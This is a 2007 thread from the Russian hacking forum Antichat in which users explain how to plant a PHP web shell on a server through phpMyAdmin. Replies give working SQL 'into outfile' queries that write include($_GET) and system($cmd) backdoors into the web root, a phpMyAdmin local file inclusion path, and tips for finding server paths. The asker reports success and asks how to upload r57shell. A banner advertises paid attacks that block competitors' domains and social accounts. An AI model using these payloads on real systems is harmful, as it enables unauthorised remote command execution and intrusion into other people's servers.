Залить ШЕЛЛ через PHPmyadmin

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > ПРОГРАММИРОВАНИЕ > PHP
Залить ШЕЛЛ через PHPmyadmin

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Залить ШЕЛЛ через PHPmyadmin

13.01.2007, 00:00

street16

Познающий

Регистрация: 18.09.2006

Сообщений: 43

С нами: 10339129

Репутация: 3

Залить ШЕЛЛ через PHPmyadmin

Собственно сабж

𝕏 Twitter Reddit Telegram Копировать ссылку

13.01.2007, 00:03

Abra

Постоянный

Регистрация: 17.09.2005

Сообщений: 375

С нами: 10866583

Репутация: 175

помоему никак.

13.01.2007, 00:14

p-range

Участник форума

Регистрация: 05.02.2006

Сообщений: 168

С нами: 10663526

Репутация: 715

если есть права на запись, выполняй запрос

select '<? include($_GET[sh]); ?>' from table into outfile '/home/user/...';

13.01.2007, 01:27

p-range

Участник форума

Регистрация: 05.02.2006

Сообщений: 168

С нами: 10663526

Репутация: 715

2ettee
а какая разница между моим и твоим постом?

13.01.2007, 01:43

street16

Познающий

Регистрация: 18.09.2006

Сообщений: 43

С нами: 10339129

Репутация: 3

а как узнать /home/site/www/dir/shell.php что именно вместо этого подставлять?

13.01.2007, 01:51

ShAnKaR

Постоянный

Регистрация: 14.07.2005

Сообщений: 964

С нами: 10960226

Репутация: 1424

кароче если версия 2.6.* и есть права на запись хоть в тмп, то можно
phpmyadmin/libraries/database_interface.lib.php?cfg[Server][extension]=LOCAL_FILE

Последний раз редактировалось ShAnKaR; 13.01.2007 в 01:54..

13.01.2007, 02:13

ShAnKaR

Постоянный

Регистрация: 14.07.2005

Сообщений: 964

С нами: 10960226

Репутация: 1424

Цитата:

Сообщение от street16

а как узнать /home/site/www/dir/shell.php что именно вместо этого подставлять?

в phpmyadmin довольно много способов узнать локальный путь например попросить какойнить файл который обычно не вызывается на прямую а только инклудится, а потом попробовать select '<? phpinfo(); ?>' into outfile '/path_to_phpmyadmin/shell.php' либо вобще поищи на http://packetstormsecurity.org про phpmyadmin инфу

13.01.2007, 02:05

street16

Познающий

Регистрация: 18.09.2006

Сообщений: 43

С нами: 10339129

Репутация: 3

phpmyadmin/libraries/database_interface.lib.php нет там такого

версия phpMyAdmin 2.5.7

13.01.2007, 03:01

street16

Познающий

Регистрация: 18.09.2006

Сообщений: 43

С нами: 10339129

Репутация: 3

ок у меня получилось select '<?php system($cmd) ?>' into outfile '/path_to_phpmyadmin/shell.php'
ротом я набрал www.host/phpmyadmin/shell.php?cmd=dir,но там все в нечетабельном виде,как мне напрмер залить r57shell? На сервере стоит винда

Последний раз редактировалось street16; 13.01.2007 в 03:08..

#10

13.01.2007, 04:42

ShAnKaR

Постоянный

Регистрация: 14.07.2005

Сообщений: 964

С нами: 10960226

Репутация: 1424

в pm

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Залить шелл через http запрос	serg™	Уязвимости	5	05.12.2006 17:27
Как залить шелл через PhpMyAdmin?	Buga	Уязвимости CMS / форумов	15	16.02.2006 22:18
Залить remview.php через phpMyAdmin	Grom	PHP	8	05.02.2006 00:19
залить шелл через ipb 2.0.4	alakazam	Уязвимости CMS / форумов	4	16.11.2005 22:08
Как залить шелл через PhPBB	SheFF	Уязвимости CMS / форумов	5	29.11.2004 01:25

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules